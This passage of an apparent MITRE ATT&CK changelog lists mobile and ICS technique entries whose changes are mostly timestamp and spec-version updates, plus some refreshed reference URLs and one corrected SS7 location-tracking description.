| modified | 2023-08-07 22:15:34.693000+00:00 | 2025-04-16 21:21:46.879000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1577] Compromise Application Executable
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:21:56.351000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1645] Compromise Client Software Binary
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:20:11.752000+00:00 | 2025-04-16 21:21:49.029000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474.002] Supply Chain Compromise: Compromise Hardware Supply Chain
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:21:12.603000+00:00 | 2025-04-16 21:21:54.553000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:28:54.940000+00:00 | 2024-11-17 13:32:52.030000+00:00 |
| external_references[1]['description'] | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016. | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf | https://dl.acm.org/doi/10.1145/2185448.2185464 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474.003] Supply Chain Compromise: Compromise Software Supply Chain
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:32:37.109000+00:00 | 2025-04-16 21:21:52.139000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.003] Protected User Data: Contact List
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:40:11.937000+00:00 | 2025-04-16 21:21:57.342000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1634] Credentials from Password Store
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 19:19:37.927000+00:00 | 2025-04-16 21:21:55.358000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1471] Data Encrypted for Impact
Current version: 3.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:55:09.397000+00:00 | 2025-04-16 21:21:57.034000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1641] Data Manipulation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:55:32.497000+00:00 | 2025-04-16 21:21:54.742000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1533] Data from Local System
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-01 16:53:27.576000+00:00 | 2025-04-16 21:21:57.505000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1481.001] Web Service: Dead Drop Resolver
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:33:56.861000+00:00 | 2025-04-16 21:21:52.296000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1626.001] Abuse Elevation Control Mechanism: Device Administrator Permissions
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 15:56:34.537000+00:00 | 2025-04-16 21:21:52.648000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1629.002] Impair Defenses: Device Lockout
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:39:10.201000+00:00 | 2025-04-16 21:21:53.782000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1629.003] Impair Defenses: Disable or Modify Tools
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:40:12.912000+00:00 | 2025-04-16 21:21:47.026000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630.003] Indicator Removal on Host: Disguise Root/Jailbreak Indicators
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:18:29.556000+00:00 | 2025-04-16 21:21:53.262000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1637.001] Dynamic Resolution: Domain Generation Algorithms
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:19:54.832000+00:00 | 2025-04-16 21:21:59.384000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1407] Download New Code at Runtime
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-08 16:23:41.271000+00:00 | 2025-04-16 21:21:50.660000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1456] Drive-By Compromise
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-07 17:12:07.620000+00:00 | 2025-04-16 21:21:59.531000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1637] Dynamic Resolution
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:19:34.225000+00:00 | 2025-04-16 21:21:47.329000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1521] Encrypted Channel
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-05 20:11:35.852000+00:00 | 2025-04-16 21:21:58.602000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1642] Endpoint Denial of Service
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:41:56.376000+00:00 | 2025-04-16 21:21:58.297000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1624] Event Triggered Execution
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:43:46.177000+00:00 | 2025-04-16 21:21:56.521000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1627] Execution Guardrails
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:44:26.317000+00:00 | 2024-11-17 18:31:54.804000+00:00 |
| external_references[1]['description'] | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019. | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://securitywithoutborders.org/blog/2019/03/29/exodus.html | https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1639] Exfiltration Over Alternative Protocol
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:39:22.707000+00:00 | 2025-04-16 21:21:48.656000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1646] Exfiltration Over C2 Channel
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:41:52+00:00 | 2025-04-16 21:21:47.650000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1639.001] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:40:40.166000+00:00 | 2025-04-16 21:21:48.130000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1404] Exploitation for Privilege Escalation
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 19:20:13.836000+00:00 | 2025-04-16 21:21:47.809000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1428] Exploitation of Remote Services
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:51:07.651000+00:00 | 2025-04-16 21:21:46.157000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630.002] Indicator Removal on Host: File Deletion
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:52:24.758000+00:00 | 2025-04-16 21:21:53.593000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1420] File and Directory Discovery
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:53:35.087000+00:00 | 2025-04-16 21:21:55.729000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1541] Foreground Persistence
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:54:25.564000+00:00 | 2025-04-16 21:21:49.743000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1417.002] Input Capture: GUI Input Capture
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:20:41.834000+00:00 | 2024-11-17 18:58:58.592000+00:00 |
| external_references[10]['description'] | Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016. | Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved November 17, 2024. |
| external_references[10]['url'] | https://www.skycure.com/blog/accessibility-clickjacking/ | https://web.archive.org/web/20170211204349/https://www.skycure.com/blog/accessibility-clickjacking/ |
[T1643] Generate Traffic from Victim
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:57:17.144000+00:00 | 2025-04-16 21:21:53.113000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1627.001] Execution Guardrails: Geofencing
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:58:14.240000+00:00 | 2025-04-16 21:21:58.143000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1628] Hide Artifacts
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:59:57.485000+00:00 | 2025-04-16 21:21:59.084000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1625] Hijack Execution Flow
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:59:46.686000+00:00 | 2025-04-16 21:21:50.121000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1617] Hooking
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:21:55.543000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1629] Impair Defenses
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:59:55.849000+00:00 | 2025-04-16 21:21:45.996000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1430.002] Location Tracking: Impersonate SS7 Nodes
Current version: 1.1
|
|
|---|
| t | Adversaries may exploit the lack of authentication in signal | t | Adversaries may exploit the lack of authentication in signal |
| ing system network nodes to track the to track the location | | ing system network nodes to track the location of mobile dev |
| of mobile devices by impersonating a node.(Citation: Engel-S | | ices by impersonating a node.(Citation: Engel-SS7)(Citation: |
| S7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citat | | Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive |
| ion: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) B | | -SS7)(Citation: CSRIC5-WG10-FinalReport) By providing t |
| y providing the victim’s MSISDN (phone number) and impersona | | he victim’s MSISDN (phone number) and impersonating network |
| ting network internal nodes to query subscriber information | | internal nodes to query subscriber information from other no |
| from other nodes, adversaries may use data collected from ea | | des, adversaries may use data collected from each hop to eve |
| ch hop to eventually determine the device’s geographical cel | | ntually determine the device’s geographical cell area or nea |
| l area or nearest cell tower.(Citation: Engel-SS7) | | rest cell tower.(Citation: Engel-SS7) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-15 15:06:03.427000+00:00 | 2025-01-21 16:22:43.947000+00:00 |
| description | Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)
By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7) | Adversaries may exploit the lack of authentication in signaling system network nodes to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport)
By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630] Indicator Removal on Host
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:42:18.121000+00:00 | 2025-04-16 21:21:44.391000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1544] Ingress Tool Transfer
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:21:05.728000+00:00 | 2025-04-16 21:21:47.175000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1417] Input Capture
Current version: 2.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:44:36.145000+00:00 | 2025-04-16 21:21:52.964000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1516] Input Injection
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-08 22:50:32.775000+00:00 | 2025-04-16 21:21:56.042000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1634.001] Credentials from Password Store: Keychain
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:45:39.362000+00:00 | 2025-04-16 21:21:51.670000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1417.001] Input Capture: Keylogging
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:48:39.936000+00:00 | 2025-04-16 21:21:53.936000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1430] Location Tracking
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:50:21.363000+00:00 | 2025-04-16 21:21:52.460000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1655] Masquerading
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 18:14:46.081000+00:00 | 2025-04-16 21:21:58.771000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1655.001] Masquerading: Match Legitimate Name or Location
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 18:15:15.902000+00:00 | 2025-04-16 21:21:44.590000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1575] Native API
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-08 15:46:24.495000+00:00 | 2025-04-16 21:21:49.389000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1464] Network Denial of Service
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:51:23.109000+00:00 | 2025-04-16 21:21:56.195000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1423] Network Service Scanning
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-11 19:12:38.451000+00:00 | 2025-04-16 21:21:47.481000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1509] Non-Standard Port
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 19:21:40.736000+00:00 | 2025-04-16 21:21:51.980000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1406] Obfuscated Files or Information
Current version: 3.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-09 14:38:34.859000+00:00 | 2025-04-16 21:21:55.894000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1481.003] Web Service: One-Way Communication
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:35:55.739000+00:00 | 2025-04-16 21:21:56.869000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1644] Out of Band Data
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:53:59.025000+00:00 | 2025-04-16 21:21:58.451000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1424] Process Discovery
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:55:23.702000+00:00 | 2025-04-16 21:21:45.337000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1631] Process Injection
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:55:54.442000+00:00 | 2025-04-16 21:21:54.246000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636] Protected User Data
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:56:20.270000+00:00 | 2025-04-16 21:21:44.829000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1604] Proxy Through Victim
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:57:14.285000+00:00 | 2025-04-16 21:21:49.548000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1631.001] Process Injection: Ptrace System Calls
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:57:40.571000+00:00 | 2025-04-16 21:21:45.841000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1663] Remote Access Software
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-25 19:53:07.406000+00:00 | 2025-04-16 21:21:44.009000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1430.001] Location Tracking: Remote Device Management Services
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:58:20.113000+00:00 | 2025-04-16 21:21:52.807000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1458] Replication Through Removable Media
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-07 17:13:04.396000+00:00 | 2024-11-17 13:26:29.167000+00:00 |
| external_references[4]['description'] | Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved September 21, 2018. | Lucas Mearian. (2018, May 9). Two vendors now sell iPhone cracking technology – and police are buying. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.computerworld.com/article/3268729/apple-ios/two-vendors-now-sell-iphone-cracking-technology-and-police-are-buying.html | https://www.techcentral.ie/two-vendors-now-sell-iphone-cracking-technology-police-buying/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1582] SMS Control
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:58:57.001000+00:00 | 2025-04-16 21:21:54.090000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1636.004] Protected User Data: SMS Messages
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:58:33.873000+00:00 | 2025-04-16 21:21:54.890000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1603] Scheduled Task/Job
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:21:43.650000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1513] Screen Capture
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:57:43.022000+00:00 | 2025-04-16 21:21:50.988000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1418.001] Software Discovery: Security Software Discovery
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:55:33.642000+00:00 | 2025-04-16 21:21:45.687000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1418] Software Discovery
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:55:03.477000+00:00 | 2025-04-16 21:21:45.152000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1406.002] Obfuscated Files or Information: Software Packing
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:54:40.501000+00:00 | 2025-04-16 21:21:49.224000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1406.001] Obfuscated Files or Information: Steganography
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-21 17:30:16.229000+00:00 | 2025-04-16 21:21:58.917000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1409] Stored Application Data
Current version: 3.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:53:16.029000+00:00 | 2024-11-17 18:31:54.805000+00:00 |
| external_references[1]['description'] | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019. | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://securitywithoutborders.org/blog/2019/03/29/exodus.html | https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1632] Subvert Trust Controls
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:52:52.097000+00:00 | 2025-04-16 21:21:51.458000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1474] Supply Chain Compromise
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:52:29.947000+00:00 | 2024-11-17 13:32:52.029000+00:00 |
| external_references[1]['description'] | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016. | M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf | https://dl.acm.org/doi/10.1145/2185448.2185464 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1521.001] Encrypted Channel: Symmetric Cryptography
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-05 20:14:17.310000+00:00 | 2025-04-16 21:21:54.401000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1633.001] Virtualization/Sandbox Evasion: System Checks
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:51:04.432000+00:00 | 2025-04-16 21:21:50.837000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1426] System Information Discovery
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-11 19:21:34.776000+00:00 | 2025-04-16 21:21:57.841000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1421] System Network Connections Discovery
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-31 16:31:12.821000+00:00 | 2025-04-16 21:21:57.189000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1625.001] Hijack Execution Flow: System Runtime API Hijacking
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 19:20:51.220000+00:00 | 2025-04-16 21:21:55.191000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1641.001] Data Manipulation: Transmitted Data Manipulation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:44:26.748000+00:00 | 2025-04-16 21:21:51.156000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1635.001] Steal Application Access Token: URI Hijacking
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:43:49.443000+00:00 | 2025-04-16 21:21:51.304000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1630.001] Indicator Removal on Host: Uninstall Malicious Application
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:43:03.218000+00:00 | 2025-04-16 21:21:44.210000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1623.001] Command and Scripting Interpreter: Unix Shell
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-07 22:48:30.418000+00:00 | 2025-04-16 21:21:50.314000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1628.002] Hide Artifacts: User Evasion
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-11 20:05:56.069000+00:00 | 2025-04-16 21:21:46.535000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1512] Video Capture
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:38:27.848000+00:00 | 2025-04-16 21:21:56.716000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1633] Virtualization/Sandbox Evasion
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 18:37:57.884000+00:00 | 2025-04-16 21:21:46.725000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1437.001] Application Layer Protocol: Web Protocols
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-06 13:07:45.661000+00:00 | 2025-04-16 21:21:46.363000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1481] Web Service
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 16:31:37.317000+00:00 | 2025-04-16 21:21:55.035000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
ics-attack
Patches
[T0800] Activate Firmware Update Mode
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:59.593000+00:00 | 2025-04-16 21:26:10.552000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0830] Adversary-in-the-Middle
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:08.233000+00:00 | 2025-04-16 21:26:16.777000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0878] Alarm Suppression
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:01.578000+00:00 | 2025-04-16 21:26:11.789000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0802] Automated Collection
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-05 16:34:58.587000+00:00 | 2025-04-15 19:58:24.843000+00:00 |
[T0895] Autorun Image
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-08 18:54:40.925000+00:00 | 2025-04-15 19:58:42.824000+00:00 |
[T0803] Block Command Message
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:58.380000+00:00 | 2025-04-15 19:58:01.218000+00:00 |
[T0804] Block Reporting Message
Current version: 1.0
Details
